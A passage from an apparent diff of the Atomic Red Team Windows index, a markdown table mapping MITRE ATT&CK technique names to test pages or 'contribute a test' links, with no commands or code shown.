Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| [Local Accounts](../../T1078.003/T1078.003.md) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [DCSync](../../T1003.006/T1003.006.md) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller 
Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to 
Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | -| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) | -| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Process Discovery](../../T1057/T1057.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](../../T1012/T1012.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Keylogging](../../T1056.001/T1056.001.md) | | [Ingress Tool 
Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Direct Volume Access](../../T1006/T1006.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | [Visual Basic](../../T1059.005/T1059.005.md) 
| [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Information Discovery](../../T1082/T1082.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) | -| | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Domain Account](../../T1136.002/T1136.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | -| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Service Discovery](../../T1007/T1007.md) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [OS Credential Dumping](../../T1003/T1003.md) | [System Time Discovery](../../T1124/T1124.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | -| | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Cracking](../../T1110.002/T1110.002.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Hijack Execution Flow [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Local Account](../../T1136.001/T1136.001.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [File Deletion](../../T1070.004/T1070.004.md) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | [Remote Access 
Software](../../T1219/T1219.md) | | -| | | [Local Accounts](../../T1078.003/T1078.003.md) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Office Application Startup](../../T1137/T1137.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Web 
Protocols](../../T1071.001/T1071.001.md) | | -| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Hide Artifacts](../../T1564/T1564.md) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Office Test](../../T1137.002/T1137.002.md) | [Port Monitors](../../T1547.010/T1547.010.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Command History Logging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Outlook Home Page](../../T1137.004/T1137.004.md) | [PowerShell Profile](../../T1546.013/T1546.013.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | | -| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process 
Injection](../../T1055/T1055.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | | -| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | | -| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | | -| | | [Port Monitors](../../T1547.010/T1547.010.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | | -| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | | -| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method 
[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | +| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | 
[CMSTP](../../T1218.003/T1218.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [Local Accounts](../../T1078.003/T1078.003.md) | [Malicious File](../../T1204.002/T1204.002.md) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 
Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [DCSync](../../T1003.006/T1003.006.md) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A 
